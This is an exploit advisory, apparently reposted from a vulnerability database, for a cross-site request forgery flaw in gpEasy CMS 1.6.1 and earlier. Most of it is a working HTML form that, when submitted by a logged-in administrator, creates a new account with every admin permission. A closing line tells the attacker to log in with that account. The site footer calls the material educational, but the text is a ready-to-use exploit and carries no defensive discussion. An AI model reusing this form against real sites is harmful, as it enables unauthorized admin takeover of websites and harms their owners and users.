============================================= gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit ============================================= Author : Giuseppe 'giudinvx' D'Inverno Email : <giudinvx[at]gmail[dot]com> Date : 04-29-2010 Site : http://www.giudinvx.altervista.org/ Location : Naples, Italy -------------------------------------------------------- Application Info Site : http://www.gpeasy.com/ Version: 1.6.1 -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <html> <form method="post" action="[patth]/index.php/Admin_Users"> <input type="text" value="xxx" name="username"><br/> <input type="password" value="xxx" name="password"><br/> <input type="password" value="xxx" name="password1"><br/> <input type="text" value="xxx" name="email"><br/> <input value="Admin_Menu" type="hidden" name="grant[]"> <input value="Admin_Uploaded" type="hidden" name="grant[]"> <input value="Admin_Extra" type="hidden" name="grant[]"> <input value="Admin_Theme" type="hidden" name="grant[]"> <input value="Admin_Users" type="hidden" name="grant[]"> <input value="Admin_Configuration" type="hidden" name="grant[]"> <input value="Admin_Trash" type="hidden" name="grant[]"> <input value="Admin_Uninstall" type="hidden" name="grant[]"> <input value="Admin_Addons" type="hidden" name="grant[]"> <input value="Admin_New" type="hidden" name="grant[]"> <input value="Admin_Theme_Content" type="hidden" name="grant[]"> <input type="hidden" value="newuser" name="cmd"> <input type="submit" value="Continue" name="aaa" class="submit"> </form> </html> # Now you have an Admin user with name: xxx and password: xxx, just login page [path]/index.php/Admin
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论